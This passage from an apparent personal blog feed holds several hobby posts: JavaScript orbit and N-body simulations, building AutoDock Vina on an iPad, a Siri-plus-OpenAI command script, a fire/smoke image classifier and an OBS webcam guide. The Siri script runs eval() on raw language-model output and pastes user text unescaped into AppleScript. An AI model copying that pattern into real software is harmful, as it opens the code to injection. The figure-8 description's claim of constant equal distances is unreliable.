color: "crimson",
dash: "dash"
},
name: "1 AU Circle",
};
const earthSunLayout = {
title: "Earth-Sun Orbit",
xaxis: {
title: "x [AU]",
range: [-1.1,1.1],
showgrid: true,
gridcolor: "rgba(255,255,255,0.5)",
gridwidth: 1,
zeroline: true,
tickmode: "auto",
nticks: 5,
},
yaxis: {
title: "y [AU]",
range: [-1.1,1.1],
showgrid: true,
gridcolor: "rgba(255,255,255,0.5)",
gridwidth: 1,
zeroline: false,
tickmode: "auto",
nticks: 5,
},
margin: {
l: 50,
r: 50,
b: 50,
t: 50,
pad: 4,
},
paper_bgcolor: "black",
plot_bgcolor: "black",
};
Plotly.newPlot("plot",[traceSun,traceEarth,traceOrbit], earthSunLayout);
The figure of 8 solution[2] in the three-body problem refers to a unique and special trajectory where three celestial bodies (e.g., planets, stars) move in a figure of 8 shaped pattern around their mutual center of mass. This is special because it represents a stable and periodic solution to the three-body problem, which is known for its complexity and lack of general solutions.
In the figure of 8 solution, each of the three bodies follows the same looping path, but with a phase difference such that when one body is at one end of the loop, the other two are symmetrically positioned elsewhere along the path. The bodies maintain equal distances from each other throughout their motion, and their velocities and positions are perfectly balanced to maintain this periodic motion.
The figure of 8 is interesting because:
It is a relatively stable solution, which means that the objects continue to follow the same looping path almost indefinitely.
It breaks down the notion that no simple periodic solutions exist for the three-body problem.
It looks cool!
The code for this simulation is very similar to the Earth-Sun orbit simulation, except that we now have three bodies instead of two. We also use a different set of initial conditions to generate the figure of 8 orbit.
function deltaR(coords, masses, nBodies, G) {
let x = coords[0];
let y = coords[1];
let vx = coords[2];
let vy = coords[3];
let delta = math.clone(coords);
for (let n = 0; n < nBodies; n++) {
let xn = x[n];
let yn = y[n];
let deltaVx = 0.0;
let deltaVy = 0.0;
for (let i = 0; i < nBodies; i++) {
if (i !== n) {
let sep = Math.sqrt(Math.pow(xn - x[i], 2) + Math.pow(yn - y[i], 2)); // Euclidean distance
deltaVx -= G * masses[i] * (xn - x[i]) / Math.pow(sep, 3);
deltaVy -= G * masses[i] * (yn - y[i]) / Math.pow(sep, 3);
}
}
delta[2][n] = deltaVx;
delta[3][n] = deltaVy;
}
delta[0] = vx;
delta[1] = vy;
return delta;
}
function step(coords, masses, deltaT, nBodies = 3, G = 6.67408313131313e-11) {
let k1 = math.multiply(deltaT, deltaR(coords, masses, nBodies, G));
let k2 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k1, 0.5)), masses, nBodies, G));
let k3 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k2, 0.5)), masses, nBodies, G));
let k4 = math.multiply(deltaT, deltaR(math.add(coords, k3), masses, nBodies, G));
coords = math.add(coords, math.multiply(math.add(k1, math.multiply(2.0, k2), math.multiply(2.0, k3), k4), 1/6));
return coords;
}
// Initial conditions setup
let M = [1, 1, 1];
let x = [-0.97000436, 0.0, 0.97000436];
let y = [0.24208753, 0.0, -0.24208753];
let vx = [0.4662036850, -0.933240737, 0.4662036850];
let vy = [0.4323657300, -0.86473146, 0.4323657300];
let Ei = -1 / Math.sqrt(Math.pow(2 * 0.97000436, 2) + Math.pow(2 * 0.24208753, 2)) - 2 / Math.sqrt(Math.pow(0.97000436, 2) + Math.pow(0.24208753, 2)) + 0.5 * (math.sum(math.add(math.dotPow(vx, 2), math.dotPow(vy, 2))));
function linspace(start, stop, num) {
const step = (stop - start) / (num - 1);
return Array.from({length: num}, (_, i) => start + (step * i));
}
let coords = [x, y, vx, vy];
const time = linspace(0, 6.3259, 1001);
let deltaT = time[1] - time[0];
let X = math.zeros(3, time.length).toArray();
let Y = math.zeros(3, time.length).toArray();
let VX = math.zeros(3, time.length).toArray();
let VY = math.zeros(3, time.length).toArray();
for (let i = 0; i < time.length; i++) {
coords = step(coords, M, deltaT, 3, 1);
X.forEach((_, idx) => X[idx][i] = coords[0][idx]);
Y.forEach((_, idx) => Y[idx][i] = coords[1][idx]);
VX.forEach((_, idx) => VX[idx][i] = coords[2][idx]);
VY.forEach((_, idx) => VY[idx][i] = coords[3][idx]);
}
The deltaR
function computes the rate of change in position and velocity of the celestial bodies based on their current positions, velocities, and masses. It accounts for the gravitational forces between all bodies.
The step
function performs a single RK4 integration step, updating the positions and velocities of the celestial bodies. It uses deltaR
to compute the four increments (k1, k2, k3, and k4) and then updates the coordinates accordingly.
Next, the initial conditions for the figure-8 three-body problem are set. The masses (M
), initial positions (x
, y
), and initial velocities (vx
, vy
) are provided. Ei
calculates the initial total energy of the system.
The linspace
function is defined to create a linearly spaced array of time points. coords
is an array containing the positions and velocities for all bodies. The time
array is created using linspace
, and deltaT
is set as the time step.
X
, Y
, VX
, and VY
are 2D arrays that will store the positions and velocities of the celestial bodies over time. They are initialized with zeros and will be updated in the loop.
Finally, a loop iterates over each time step, updating the positions and velocities of the celestial bodies using the step
function. The updated coordinates are stored in the X
, Y
, VX
, and VY
arrays.
Now that we have time-series data, we need to animate it. We can use Plotly's animate function, as this does not force a full re-render, saving us some precious GPU and CPU cycles when we are trying to run this in the browser itself
function plotClassicFunc() {
var tailLength = 1;
if (plotIndex < tailLength) {
tailLength = 0;
} else if (plotIndex > time.length) {
plotIndex = 0;
} else {
tailLength = plotIndex - tailLength;
}
var currentIndex = plotIndex;
try {
time[currentIndex].toFixed(3);
} catch (e) {
currentIndex = 0;
}
const data = [
{
x: X[0].slice(tailLength, currentIndex),
y: Y[0].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
{
x: X[1].slice(tailLength, currentIndex),
y: Y[1].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
{
x: X[2].slice(tailLength, currentIndex),
y: Y[2].slice(tailLength, currentIndex),
mode: 'lines+markers',
marker: {
symbol: 'star',
size: 8,
line: { width: 0 },
},
line: {
width: 2,
},
name: '',
},
];
// width: 1000, height: 400
const layout = {
title: '∞ Three-Body Problem: t = ' + time[currentIndex].toFixed(3),
xaxis: {
title: 'x',
range: [-1.1,1.1]
},
yaxis: {
title: 'y',
scaleanchor: 'x',
scaleratio: 1,
range: [-0.5,0.5]
},
plot_bgcolor: 'black',
paper_bgcolor: 'black',
font: {
color: 'white',
},
};
try {
Plotly.animate("plot", {
data: data, layout: layout
}, {
staticPlot: true,
transition: {
duration: 0,
},
frame: {
duration: 0,
redraw: false,
}
});
} catch (err) {
Plotly.newPlot('plot', data, layout);
}
plotIndex += delay;
if (plotClassic===true) {
try {
requestAnimationFrame(plotClassicFunc);
}
catch (err) {
console.log(err)
}
}
}
function step(coords, masses, deltaT, nBodies = 3, G = 6.67408313131313e-11) {
let k1 = math.multiply(deltaT, deltaR(coords, masses, nBodies, G));
let k2 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k1, 0.5)), masses, nBodies, G));
let k3 = math.multiply(deltaT, deltaR(math.add(coords, math.multiply(k2, 0.5)), masses, nBodies, G));
let k4 = math.multiply(deltaT, deltaR(math.add(coords, k3), masses, nBodies, G));
coords = math.add(coords, math.multiply(math.add(k1, math.multiply(2.0, k2), math.multiply(2.0, k3), k4), 1/6));
return coords;
}
function detectCollisionsEscape(coords, deltaT, maxSep) {
const [x, y, vx, vy] = coords;
const V = vx.map((v, i) => Math.sqrt(v ** 2 + vy[i] ** 2));
const R = V.map(v => v * deltaT);
let collision = false, collisionInds = null, escape = false, escapeInd = null;
for (let n = 0; n < x.length; n++) {
const rn = R[n], xn = x[n], yn = y[n];
for (let i = 0; i < x.length; i++) {
if (i !== n) {
const minSep = rn + R[i];
const sep = Math.sqrt((xn - x[i]) ** 2 + (yn - y[i]) ** 2);
if (sep < minSep) {
collision = true;
collisionInds = [n, i];
} else if (sep > maxSep) {
escape = true;
escapeInd = n;
return [collision, collisionInds, escape, escapeInd];
}
}
}
}
return [collision, collisionInds, escape, escapeInd];
}
function nBodyStep(coords, masses, deltaT, maxSep, nBodies, G = 6.67408313131313e-11) { // Similar to our step function before, but keeping track of collisions
coords = step(coords, masses, deltaT, nBodies, G); // Update the positions as we did before
//console.log(detectCollisionsEscape(coords, deltaT, maxSep));
let [collision, collisionInds, escape, escapeInd] = detectCollisionsEscape(coords, deltaT, maxSep); // Detect collisions/escapes
if (collision) { // Do inelastic collision and delete extra body (2 -> 1)
const [i1, i2] = collisionInds;
const [x1, x2] = [coords[0][i1], coords[0][i2]];
const [y1, y2] = [coords[1][i1], coords[1][i2]];
const [vx1, vx2] = [coords[2][i1], coords[2][i2]];
const [vy1, vy2] = [coords[3][i1], coords[3][i2]];
const [px1, px2] = [masses[i1] * vx1, masses[i2] * vx2];
const [py1, py2] = [masses[i1] * vy1, masses[i2] * vy2];
const px = px1 + px2;
const py = py1 + py2;
const newM = masses[i1] + masses[i2];
const vfx = px / newM;
const vfy = py / newM;
coords[0][i1] = (x1 * masses[i1] + x2 * masses[i2]) / (masses[i1] + masses[i2]); // Center of mass
coords[1][i1] = (y1 * masses[i1] + y2 * masses[i2]) / (masses[i1] + masses[i2]);
coords[2][i1] = vfx;
coords[3][i1] = vfy;
coords[0].splice(i2, 1);
coords[1].splice(i2, 1);
coords[2].splice(i2, 1);
coords[3].splice(i2, 1);
masses[i1] = newM;
masses.splice(i2, 1);
nBodies--;
}
// Could also implement condition for escape where we stop calculating forces but I'm too lazy for now
return [coords, masses, nBodies, collision, collisionInds, escape, escapeInd];
}
function uniform(min, max) {
return Math.random() * (max - min) + min;
}
function deepCopyCoordsArray(arr) {
return arr.map(innerArr => innerArr.slice());
}
function genNBodyResults(nBodies, tStop, nTPts, nBodiesStop = 10, G = 6.67408313131313e-11) {
var btn = document.getElementById("startSim3");
// Set button text to Solving
var prevText = btn.innerHTML;
btn.innerHTML = "Solving...";
let coords = [Array(nBodies).fill(0), Array(nBodies).fill(0), Array(nBodies).fill(0), Array(nBodies).fill(0)];
const Mstar = 2e30;
const Mp = Mstar / 1e4;
for (let i = 0; i < nBodies; i++) { // Initialize coordinates on ~Keplerian orbits
let accept = false;
let r = null;
while (!accept) { // Prevent a particle from spawning within 0.2 AU too close to "star"
r = Math.random() * 2 * 1.5e11; // Say radius of 2 AU
if (r / 1.5e11 > 0.2) {
accept = true;
}
}
const theta = uniform(0, 2 * Math.PI);
const x = r * Math.cos(theta);
const y = r * Math.sin(theta);
const v = Math.sqrt(G * Mstar / r);
const perturbedV = v + v / 1000 * uniform(-1, 1); // Perturb the velocities ever so slightly
const vTheta = Math.atan2(y, x);
coords[0][i] = x;
coords[1][i] = y;
coords[2][i] = -perturbedV * Math.sin(vTheta);
coords[3][i] = perturbedV * Math.cos(vTheta);
}
//console.log('Initial coords:', coords);
let masses = Array(nBodies).fill(Mp); // Initialize masses
masses[0] = Mstar; // Make index one special as the central star
coords[0][0] = 0;
coords[1][0] = 0;
coords[2][0] = 0;
coords[3][0] = 0; // Initialize central star at origin with no velocity
const yearSec = 365 * 24 * 3600;
const time = Array.from({ length: nTPts }, (_, i) => i * tStop / (nTPts - 1) * yearSec); // Years -> s
let t = time[0];
const deltaT = time[1] - time[0];
let tInd = 0;
const coordsRecord = [deepCopyCoordsArray(coords)];
const massRecord = [masses.slice()]; // Initialize records with initial conditions
while (tInd < nTPts && nBodies > nBodiesStop) {
//console.log('Initial coords:', coords);
[coords, masses, nBodies] = nBodyStep(coords, masses, deltaT, 10 * 1.5e11, nBodies, G); // Update
coordsRecord.push(deepCopyCoordsArray(coords));
massRecord.push(masses.slice()); // Add to records
tInd++;
t = time[tInd];
//console.log(`currently at t = ${(t / yearSec).toFixed(2)} years\r`);
}
console.log(`final time = ${time[tInd] / yearSec} years with ${nBodies} bodies remaining`);
// Set button text to Start Simulation
btn.innerHTML = prevText;
return [coordsRecord, massRecord, time.slice(0, tInd + 1)];
}
var [coordsRecordR, _, tR] = genNBodyResults(256,1,1001);
//console.log(coordsRecordR);
const yearSec = 365 * 24 * 3600;
function createFrame(coordsR) {
if (!coordsR || !coordsR[0] || !coordsR[1]) {
return [];
}
const traceCentralStar = {
x: [coordsR[0][0] / 1.5e11],
y: [coordsR[1][0] / 1.5e11],
mode: 'markers',
type: 'scatter',
name: 'Central star',
marker: { color: 'gold', symbol: 'star', size: 10 },
};
const xCoords = coordsR[0].slice(1).map(x => x / 1.5e11);
const yCoords = coordsR[1].slice(1).map(y => y / 1.5e11);
const traceOtherBodies = {
x: xCoords,
y: yCoords,
mode: 'markers',
type: 'scatter',
name: '',
marker: { color: 'dodgerblue', symbol: 'circle', size: 2 },
};
return [traceCentralStar, traceOtherBodies];
}
function createLayout(i) {
return {
title: {
text: `N-Body Problem: t = ${Number(t[i] / yearSec).toFixed(3)} years`,
x: 0.03,
y: 0.97,
xanchor: 'left',
yanchor: 'top',
font: { size: 14 },
},
xaxis: { title: 'x [AU]', range: [-2.1, 2.1] },
yaxis: { title: 'y [AU]', range: [-2.1, 2.1], scaleanchor: 'x', scaleratio: 1 },
showlegend: false,
margin: { l: 60, r: 40, t: 40, b: 40 },
width: 800,
height: 800,
plot_bgcolor: 'black',
};
}
function animateNBodyProblem() {
const nFrames = tR.length;
for (let i = 0; i < nFrames; i++) {
const frameData = createFrame(coordsRecordR[i]);
const layout = createLayout(i);
//Plotly.newPlot(plotDiv, frameData, layout);
try {
Plotly.animate("plot", {
data: frameData, layout: layout
}, {
staticPlot: true,
transition: {
duration: 0,
},
frame: {
duration: 0,
redraw: false,
}
});
} catch (err) {
Plotly.newPlot('plot', frameData, layout);
}
}
}
animateNBodyProblem();
import numpy
import PIL
# Convert PIL Image to NumPy array
img = PIL.Image.open("foo.jpg")
arr = numpy.array(img)
# Convert array to Image
img = PIL.Image.fromarray(arr)
try:
img.save(destination, "JPEG", quality=80, optimize=True, progressive=True)
except IOError:
PIL.ImageFile.MAXBLOCK = img.size[0] * img.size[1]
img.save(destination, "JPEG", quality=80, optimize=True, progressive=True)
Tested on macOS
Creating the archive:
zip -r -s 5 oodlesofnoodles.zip website/
5 stands for each split files' size (in mb, kb and gb can also be specified)
For encrypting the zip:
zip -er -s 5 oodlesofnoodles.zip website
Extracting Files
First we need to collect all parts, then
zip -F oodlesofnoodles.zip --out merged.zip
Why? Because I can.
makedepend
is a Unix tool used to generate dependencies of C source files. Most modern programs do not use this anymore, but then again AutoDock Vina's source code hasn't been changed since 2011. The first hurdle came when I saw that there was no makedepend command, neither was there any package on any development repository for iOS. So, I tracked down the original source code for makedepend
(https://github.com/DerellLicht/makedepend). According to the repository this is actually the source code for the makedepend utility that came with some XWindows distribution back around Y2K. I am pretty sure there is a problem with my current compiler configuration because I had to manually edit the Makefile
to provide the path to the iOS SDKs using the -isysroot
flag.
Original Makefile ( I used the provided mac Makefile base )
BASE=/usr/local
BOOST_VERSION=1_41
BOOST_INCLUDE = $(BASE)/include
C_PLATFORM=-arch i386 -arch ppc -isysroot /Developer/SDKs/MacOSX10.5.sdk -mmacosx-version-min=10.4
GPP=/usr/bin/g++
C_OPTIONS= -O3 -DNDEBUG
BOOST_LIB_VERSION=
include ../../makefile_common
I installed Boost 1.68.0-1 from Sam Bingner's repository. ( Otherwise I would have had to compile boost too 😫 )
Edited Makefile
BASE=/usr
BOOST_VERSION=1_68
BOOST_INCLUDE = $(BASE)/include
C_PLATFORM=-arch arm64 -isysroot /var/sdks/Latest.sdk
GPP=/usr/bin/g++
C_OPTIONS= -O3 -DNDEBUG
BOOST_LIB_VERSION=
include ../../makefile_common
Of course since Boost 1.41 many things have been added and deprecated, that is why I had to edit the source code to make it work with version 1.68
../../../src/main/main.cpp:50:9: error: no matching constructor for initialization of 'path' (aka 'boost::filesystem::path')
return path(str, boost::filesystem::native);
This was an easy fix, I just commented this and added a return statement to return the path
return path(str)
../../../src/main/main.cpp:665:57: error: no member named 'native_file_string' in 'boost::filesystem::path'
std::cerr << "\n\nError: could not open \"" << e.name.native_file_string() << "\" for " << (e.in ? "reading" : "writing") << ".\n";
~~~~~~ ^
../../../src/main/main.cpp:677:80: error: no member named 'native_file_string' in 'boost::filesystem::path'
std::cerr << "\n\nParse error on line " << e.line << " in file \"" << e.file.native_file_string() << "\": " << e.reason << '\n';
~~~~~~ ^
2 errors generated.
Turns out native_file_string
was deprecated in Boost 1.57 and replaced with just string
This one still boggles me because there was no reason for it to not work, as a workaround I downloaded the DEB, extracted it and used that path for compiling.
But, this time in another file and I quickly fixed it
Obviously it was working on my iPad, but would it work on another device? I transferred the compiled binary and
The package is available on my repository and only depends on boost. ( Both, Vina and Vina-Split are part of the package)
]]>My main objective was to see if I could issue multi-intent commands in one go. Obviously, Siri cannot do that (neither can Alexa, Cortana, or Google Assistant). The script here can issue either a single command, or use the help of OpenAI's DaVinci model to extract multiple commands and pass them onto siri.
If you are here just for the code:
import argparse
import applescript
import openai
from os import getenv
openai.api_key = getenv("OPENAI_KEY")
engine = "text-davinci-003"
def execute_with_llm(command_text: str) -> None:
llm_prompt = f"""You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
"""
completion = openai.Completion.create(engine=engine, prompt=llm_prompt, max_tokens=len(command_text.split(" "))*2)
for task in eval(completion.choices[0].text):
execute_command(task)
def execute_command(command_text: str) -> None:
"""Execute a Siri command."""
script = applescript.AppleScript(f"""
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "{command_text}"
keystroke textToType
key code 36
end tell
""")
script.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", type=str, help="The command to pass to Siri", default="What time is it?")
parser.add_argument('--openai', action=argparse.BooleanOptionalAction, help="Use OpenAI to detect multiple intents", default=False)
args = parser.parse_args()
if args.openai:
execute_with_llm(args.command)
else:
execute_command(args.command)
Usage:
python3 main.py "play some taylor swift"
python3 main.py "turn off the lights and play some music" --openai
I am not actually going to explain it as if I am explaining to a five-year old kid.
In the age of Siri Shortcuts, AppleScript can still do more. It is a scripting language created by Apple that can help you automate pretty much anything you see on your screen.
We use the following AppleScript to trigger Siri and then type in our command:
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "Play some rock music"
keystroke textToType
key code 36
end tell
This first triggers Siri, waits for a couple of seconds, and then types in our command. In the script, this functionality is handled by the execute_command
function.
import applescript
def execute_command(command_text: str) -> None:
"""Execute a Siri command."""
script = applescript.AppleScript(f"""
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "{command_text}"
keystroke textToType
key code 36
end tell
""")
script.run()
We can call OpenAI's API to autocomplete our prompt and extract multiple commands. We don't need to use OpenAI's API, and can also simply use Google's Flan-T5 model using HuggingFace's transformers library.
You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
This prompt gives the model a few examples to increase the generation accuracy, along with instructing it to return a Python list.
import openai
from os import getenv
openai.api_key = getenv("OPENAI_KEY")
engine = "text-davinci-003"
def execute_with_llm(command_text: str) -> None:
llm_prompt = f"""You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
"""
completion = openai.Completion.create(engine=engine, prompt=llm_prompt, max_tokens=len(command_text.split(" "))*2)
for task in eval(completion.choices[0].text): # NEVER EVAL IN PROD RIGHT LIKE THIS
execute_command(task)
To finish it all off, we can use argparse to only send the input command to OpenAI when asked to do so.
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", type=str, help="The command to pass to Siri", default="What time is it?")
parser.add_argument('--openai', action=argparse.BooleanOptionalAction, help="Use OpenAI to detect multiple intents", default=False)
args = parser.parse_args()
if args.openai:
execute_with_llm(args.command)
else:
execute_command(args.command)
Siri is still dumb. When I ask it to Switch off the lights
, it default to the home thousands of miles away. But, this code snippet definitely does work!
For setting up Kaggle with Google Colab, please refer to my previous post
import os
from google.colab import drive
drive.mount('/content/drive')
os.environ['KAGGLE_CONFIG_DIR'] = "/content/drive/My Drive/"
!kaggle datasets download ashutosh69/fire-and-smoke-dataset
!unzip "fire-and-smoke-dataset.zip"
!mkdir default smoke fire
\
!ls data/data/img_data/train/default/*.jpg
\
img_1002.jpg img_20.jpg img_519.jpg img_604.jpg img_80.jpg
img_1003.jpg img_21.jpg img_51.jpg img_60.jpg img_8.jpg
img_1007.jpg img_22.jpg img_520.jpg img_61.jpg img_900.jpg
img_100.jpg img_23.jpg img_521.jpg 'img_62 (2).jpg' img_920.jpg
img_1014.jpg img_24.jpg 'img_52 (2).jpg' img_62.jpg img_921.jpg
img_1018.jpg img_29.jpg img_522.jpg 'img_63 (2).jpg' img_922.jpg
img_101.jpg img_3000.jpg img_523.jpg img_63.jpg img_923.jpg
img_1027.jpg img_335.jpg img_524.jpg img_66.jpg img_924.jpg
img_102.jpg img_336.jpg img_52.jpg img_67.jpg img_925.jpg
img_1042.jpg img_337.jpg img_530.jpg img_68.jpg img_926.jpg
img_1043.jpg img_338.jpg img_531.jpg img_700.jpg img_927.jpg
img_1046.jpg img_339.jpg 'img_53 (2).jpg' img_701.jpg img_928.jpg
img_1052.jpg img_340.jpg img_532.jpg img_702.jpg img_929.jpg
img_107.jpg img_341.jpg img_533.jpg img_703.jpg img_930.jpg
img_108.jpg img_3.jpg img_537.jpg img_704.jpg img_931.jpg
img_109.jpg img_400.jpg img_538.jpg img_705.jpg img_932.jpg
img_10.jpg img_471.jpg img_539.jpg img_706.jpg img_933.jpg
img_118.jpg img_472.jpg img_53.jpg img_707.jpg img_934.jpg
img_12.jpg img_473.jpg img_540.jpg img_708.jpg img_935.jpg
img_14.jpg img_488.jpg img_541.jpg img_709.jpg img_938.jpg
img_15.jpg img_489.jpg 'img_54 (2).jpg' img_70.jpg img_958.jpg
img_16.jpg img_490.jpg img_542.jpg img_710.jpg img_971.jpg
img_17.jpg img_491.jpg img_543.jpg 'img_71 (2).jpg' img_972.jpg
img_18.jpg img_492.jpg img_54.jpg img_71.jpg img_973.jpg
img_19.jpg img_493.jpg 'img_55 (2).jpg' img_72.jpg img_974.jpg
img_1.jpg img_494.jpg img_55.jpg img_73.jpg img_975.jpg
img_200.jpg img_495.jpg img_56.jpg img_74.jpg img_980.jpg
img_201.jpg img_496.jpg img_57.jpg img_75.jpg img_988.jpg
img_202.jpg img_497.jpg img_58.jpg img_76.jpg img_9.jpg
img_203.jpg img_4.jpg img_59.jpg img_77.jpg
img_204.jpg img_501.jpg img_601.jpg img_78.jpg
img_205.jpg img_502.jpg img_602.jpg img_79.jpg
img_206.jpg img_50.jpg img_603.jpg img_7.jpg
The image files are not actually JPEG, thus we first need to save them in the correct format for Turicreate
from PIL import Image
import glob
folders = ["default","smoke","fire"]
for folder in folders:
n = 1
for file in glob.glob("./data/data/img_data/train/" + folder + "/*.jpg"):
im = Image.open(file)
rgb_im = im.convert('RGB')
rgb_im.save((folder + "/" + str(n) + ".jpg"), quality=100)
n +=1
for file in glob.glob("./data/data/img_data/train/" + folder + "/*.jpg"):
im = Image.open(file)
rgb_im = im.convert('RGB')
rgb_im.save((folder + "/" + str(n) + ".jpg"), quality=100)
n +=1
\
!mkdir train
!mv default ./train
!mv smoke ./train
!mv fire ./train
!pip install turicreate
\
import turicreate as tc
import os
data = tc.image_analysis.load_images("./train", with_path=True)
data["label"] = data["path"].apply(lambda path: os.path.basename(os.path.dirname(path)))
print(data)
data.save('fire-smoke.sframe')
\
+-------------------------+------------------------+
| path | image |
+-------------------------+------------------------+
| ./train/default/1.jpg | Height: 224 Width: 224 |
| ./train/default/10.jpg | Height: 224 Width: 224 |
| ./train/default/100.jpg | Height: 224 Width: 224 |
| ./train/default/101.jpg | Height: 224 Width: 224 |
| ./train/default/102.jpg | Height: 224 Width: 224 |
| ./train/default/103.jpg | Height: 224 Width: 224 |
| ./train/default/104.jpg | Height: 224 Width: 224 |
| ./train/default/105.jpg | Height: 224 Width: 224 |
| ./train/default/106.jpg | Height: 224 Width: 224 |
| ./train/default/107.jpg | Height: 224 Width: 224 |
+-------------------------+------------------------+
[2028 rows x 2 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.
+-------------------------+------------------------+---------+
| path | image | label |
+-------------------------+------------------------+---------+
| ./train/default/1.jpg | Height: 224 Width: 224 | default |
| ./train/default/10.jpg | Height: 224 Width: 224 | default |
| ./train/default/100.jpg | Height: 224 Width: 224 | default |
| ./train/default/101.jpg | Height: 224 Width: 224 | default |
| ./train/default/102.jpg | Height: 224 Width: 224 | default |
| ./train/default/103.jpg | Height: 224 Width: 224 | default |
| ./train/default/104.jpg | Height: 224 Width: 224 | default |
| ./train/default/105.jpg | Height: 224 Width: 224 | default |
| ./train/default/106.jpg | Height: 224 Width: 224 | default |
| ./train/default/107.jpg | Height: 224 Width: 224 | default |
+-------------------------+------------------------+---------+
[2028 rows x 3 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.
import turicreate as tc
# Load the data
data = tc.SFrame('fire-smoke.sframe')
# Make a train-test split
train_data, test_data = data.random_split(0.8)
# Create the model
model = tc.image_classifier.create(train_data, target='label')
# Save predictions to an SArray
predictions = model.predict(test_data)
# Evaluate the model and print the results
metrics = model.evaluate(test_data)
print(metrics['accuracy'])
# Save the model for later use in Turi Create
model.save('fire-smoke.model')
# Export for use in Core ML
model.export_coreml('fire-smoke.mlmodel')
\
Performing feature extraction on resized images...
Completed 64/1633
Completed 128/1633
Completed 192/1633
Completed 256/1633
Completed 320/1633
Completed 384/1633
Completed 448/1633
Completed 512/1633
Completed 576/1633
Completed 640/1633
Completed 704/1633
Completed 768/1633
Completed 832/1633
Completed 896/1633
Completed 960/1633
Completed 1024/1633
Completed 1088/1633
Completed 1152/1633
Completed 1216/1633
Completed 1280/1633
Completed 1344/1633
Completed 1408/1633
Completed 1472/1633
Completed 1536/1633
Completed 1600/1633
Completed 1633/1633
PROGRESS: Creating a validation set from 5 percent of training data. This may take a while.
You can set ``validation_set=None`` to disable validation tracking.
Logistic regression:
--------------------------------------------------------
Number of examples : 1551
Number of classes : 3
Number of feature columns : 1
Number of unpacked features : 2048
Number of coefficients : 4098
Starting L-BFGS
--------------------------------------------------------
+-----------+----------+-----------+--------------+-------------------+---------------------+
| Iteration | Passes | Step size | Elapsed Time | Training Accuracy | Validation Accuracy |
+-----------+----------+-----------+--------------+-------------------+---------------------+
| 0 | 6 | 0.018611 | 0.891830 | 0.553836 | 0.560976 |
| 1 | 10 | 0.390832 | 1.622383 | 0.744681 | 0.792683 |
| 2 | 11 | 0.488541 | 1.943987 | 0.733075 | 0.804878 |
| 3 | 14 | 2.442703 | 2.512545 | 0.727917 | 0.841463 |
| 4 | 15 | 2.442703 | 2.826964 | 0.861380 | 0.853659 |
| 9 | 28 | 2.340435 | 5.492035 | 0.941328 | 0.975610 |
+-----------+----------+-----------+--------------+-------------------+---------------------+
Performing feature extraction on resized images...
Completed 64/395
Completed 128/395
Completed 192/395
Completed 256/395
Completed 320/395
Completed 384/395
Completed 395/395
0.9316455696202531
We just got an accuracy of 94% on Training Data and 97% on Validation Data!
]]>Here are the results before you begin reading.
I am running macOS and iOS but I will try to link the same steps for Windows as well. If you are running Arch, I assume you already know what you are doing and are using this post as an inspiration and not a how-to guide.
I assume that you have Homebrew installed.
Description
brew cask install obs
brew cask install obs-virtualcam
Windows users can install the latest version of the plugin from OBS-Forums
I have always liked PewDiePie's animated border he uses in his videos
The border was apparently made by a YouTuber Sleepy Tanooki. He posted a link to a Google Drive folder containing the video file. (I will be using the video overlay for the example)
It is pretty simple to use overlays in OBS:
First, Create a new scene by clicking on the plus button on the bottom right corner.
Now, in the Sources section click on the add button -> Video Capture Device -> Create New -> Choose your webcam from the Device section.
You may, resize if you want
After this, again click on the add button, but this time choose the Media Source
option
and, locate and choose the downloaded overlay.
I have a Sony mirrorless camera. Using Sony's Imaging Edge Desktop, you can use your laptop as a remote viewfinder and capture or record media.
After installing Image Edge Desktop or your Camera's equivalent, open the Remote
application.
Once you are able to see the output of the camera on the application, switch to OBS. Create a new scene, and this time choose Window Capture
in the Sources menu. After you have chosen the appropriate window, you may transform/crop the output using the properties/filters options.
Connect your iPhone via a USB cable, then Open Quicktime -> File -> New Movie Recording
In the Sources choose your device (No need to press record). You may open the camera app now.
Now, in OBS create a new scene, and in the sources choose the Window Capture
option. You will need to rotate the source:
Install the Camo app on your phone through the app store -> connect to Mac using USB cable, install the companion app and you are done.
I tried both my current iPhone and an old iPhone 5S
